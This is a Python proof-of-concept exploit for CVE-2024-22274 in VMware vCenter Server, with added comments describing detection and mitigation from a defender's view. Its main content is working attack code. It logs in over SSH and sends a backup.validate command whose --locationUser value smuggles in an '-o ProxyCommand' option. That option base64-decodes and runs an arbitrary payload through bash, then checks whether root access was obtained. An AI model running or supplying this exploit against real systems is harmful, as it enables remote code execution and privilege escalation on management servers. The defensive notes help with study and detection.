# Proof-of-concept client for CVE-2024-22274, which the argparse description
# below calls "Authenticated Remote Code Execution in VMware vCenter Server".
#
# Reviewer notes (defender's view, based only on what this file shows):
#   * Precondition: a working SSH username/password for the target. Nothing
#     here bypasses authentication; the issue is what an already-authenticated
#     shell user can make `backup.validate` do.
#   * Mechanism as visible in the command string: the `--locationUser` value
#     starts with `-o ProxyCommand=...`. Presumably the appliance passes that
#     value unsanitised to an ssh/sftp client, which reads it as an option
#     (option injection) -- TODO confirm against the vendor advisory.
#   * Detection: look for `backup.validate` invocations whose `--locationUser`
#     begins with `-` or contains `ProxyCommand`, and for `base64 -d | bash`
#     in process or shell audit logs on the appliance. Correlate these with
#     SSH logins from hosts that do not normally administer vCenter.
#   * Mitigation: install the vendor's fixed build for this CVE, restrict SSH
#     access to the appliance to management networks, and review which
#     accounts are allowed to log in to its shell.
import base64
import argparse
from fabric import Connection
from colorama import Fore, Style, init

# autoreset=True makes colorama reset the terminal colour after every print.
init(autoreset=True)


def ssh_credentials(config_file: str) -> dict[str, str]:
    """Read ``key=value`` pairs from *config_file* into a dict.

    Each line is stripped and split on the first ``=`` only, so values may
    contain ``=``. A blank line, or any line without ``=``, makes the tuple
    unpacking fail with ``ValueError``; nothing in this function catches it.

    The file holds the SSH password in plaintext (see ``exploit``, which
    reads the ``username`` and ``password`` keys), so the file itself is
    sensitive.

    Args:
        config_file: Path of the credentials file.

    Returns:
        Mapping of every key found in the file to its value.
    """
    credentials = {}
    with open(config_file, 'r') as file:
        for line in file:
            # maxsplit=1: only the first '=' separates key from value.
            key, value = line.strip().split('=', 1)
            credentials[key] = value
    return credentials


def exploit(host: str, port: int, payload_path: str, credentials: dict[str, str]) -> None:
    """Log in over SSH and run one crafted ``backup.validate`` command.

    All failures (file errors, bad base64, missing credentials, SSH or
    command errors) are caught by the broad ``except`` at the bottom and
    printed; the function always returns ``None``.

    Args:
        host: Address of the SSH server to connect to.
        port: SSH port.
        payload_path: File whose stripped content is base64-decoded and
            interpolated into the command string.
        credentials: Mapping that must contain non-empty ``username`` and
            ``password`` entries.
    """
    try:
        with open(payload_path, 'r') as file:
            payload_encoded = file.read().strip()
            # .decode() with no argument assumes the decoded bytes are UTF-8.
            decode_payload = base64.b64decode(payload_encoded).decode()

        # VMware vCenter command
        # The `--locationUser` value is the part that matters for detection:
        # a real SFTP user name would not start with `-o ProxyCommand=`.
        payload_command = f""" backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=/bin/bash -c "echo {decode_payload} | base64 -d | bash"' --locationPassword """

        username = credentials.get('username')
        password = credentials.get('password')

        # An empty string is rejected as well as a missing key.
        if not username or not password:
            raise ValueError(f"{Fore.LIGHTYELLOW_EX}Username or password not found in configuration file.{Style.RESET_ALL}")

        # Password authentication only. The connection is never closed
        # explicitly in this function.
        conn = Connection(
            host=host,
            port=port,
            user=username,
            connect_kwargs={"password": password}
        )

        # NOTE(review): Fabric connects lazily, so this message is printed
        # before any network connection has been attempted -- confirm.
        print(f"{Fore.LIGHTGREEN_EX}[+] Connected to {Fore.LIGHTWHITE_EX}{host} via SSH{Style.RESET_ALL}")

        # hide=True stops Fabric echoing remote output; it is printed below
        # instead. By default Fabric raises on a non-zero exit status, which
        # lands in the except clause at the bottom.
        result = conn.run(payload_command, hide=True)
        print(f"{Fore.LIGHTGREEN_EX}[+] Payload executed successfully.{Fore.LIGHTWHITE_EX} Output: {result.stdout}{Style.RESET_ALL}")

        # Loose success heuristic: any occurrence of "root" or "uid=0" in
        # stdout counts, whatever produced it.
        if "root" in result.stdout.lower() or "uid=0" in result.stdout.lower():
            print(f"{Fore.LIGHTGREEN_EX}[+] Exploitation successful: You have root access.{Style.RESET_ALL}")
        else:
            print(f"{Fore.LIGHTRED_EX}[+] Exploitation failed: Root access not obtained.{Style.RESET_ALL}")

        print(f"{Fore.LIGHTBLUE_EX}[+] Finished executing commands on {host}{Style.RESET_ALL}")

    except Exception as ex:
        # Catch-all: every error is reduced to a single printed line.
        print(f"{Fore.LIGHTRED_EX}[-] Error: {ex}{Style.RESET_ALL}")


def main() -> None:
    """Print the banner, parse the command line and call ``exploit``.

    The banner is printed before ``parse_args()``, so it also appears with
    ``-h`` or invalid arguments. ``ssh_credentials`` is called outside any
    ``try`` block, so a missing or malformed credentials file surfaces as an
    uncaught exception.
    """
    banner = f"""{Fore.LIGHTGREEN_EX} ___ ___ _______ ______ __ | | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----. | | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _| \_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__| Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu {Style.RESET_ALL}"""

    parser = argparse.ArgumentParser(
        description="Privileges Escalation: Authenticated Remote Code Execution in VMware vCenter Server",
        epilog=f"{Fore.LIGHTGREEN_EX}Exploit usage: python3 CVE-2024-22274-RCE.py -t 192.168.1.100 -P 22 -p payload.txt -c vCenter_creds.txt{Style.RESET_ALL}"
    )
    print(banner)
    parser.add_argument('-t', '--target', required=True, help="Target Host address to connect to")
    parser.add_argument('-P', '--port', type=int, default=22, help="Port number (default: 22)")
    parser.add_argument('-p', '--payload', required=True, help="File containing the base64-encoded payload")
    parser.add_argument('-c', '--config', default='vCenter_creds.txt', help="File containing SSH credentials (default: vCenter_creds.txt)")

    args = parser.parse_args()

    credentials = ssh_credentials(args.config)

    exploit(
        host=args.target,
        port=args.port,
        payload_path=args.payload,
        credentials=credentials
    )


if __name__ == "__main__":
    main()